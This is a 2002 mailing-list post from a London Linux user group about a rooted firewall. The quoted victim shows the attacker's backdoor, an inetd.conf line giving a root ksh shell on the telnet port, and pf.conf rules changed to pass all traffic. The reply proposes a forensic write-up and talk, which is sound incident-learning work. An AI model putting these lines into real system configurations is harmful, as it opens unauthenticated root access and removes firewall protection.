[Gllug] My firewall is rooted

John HEARNS john.hearns at cern.ch
Mon Jul 15 13:43:23 UTC 2002


On Mon, 2002-07-15 at 14:26, Stephen Harker wrote:
> On Monday 15 July 2002 12:29, Xander D Harkness wrote:
> > I would expect there to be at least two or three back doors.
> 
> Well here's one...
> My inetd.conf file was renamed to inetd.conf.gay
> and the new one says...
> 
> telnet stream tcp nowait root /bin/ksh ksh
> 
> So thats pretty obvious.
> And my pf.conf rule became pf.conf.gay and the new one says...
> 
> pass in all
> pass out all
> 
> Which doesn't make it much of a firewall anymore :-(
> CRAP!!
> 
As Huw says, a good learning experience.

How about bringing the rogue disk along to a meeting?
We can keep it in a cage and poke sticks at it.

Seriously though - how about a writeup, and maybe 
a short talk?

* this is how I discovered that there was a compromise

* steps I took to immediately recover

* forensic traces

* tools you might use

* etc



-- 
Gllug mailing list  -  Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug




More information about the GLLUG mailing list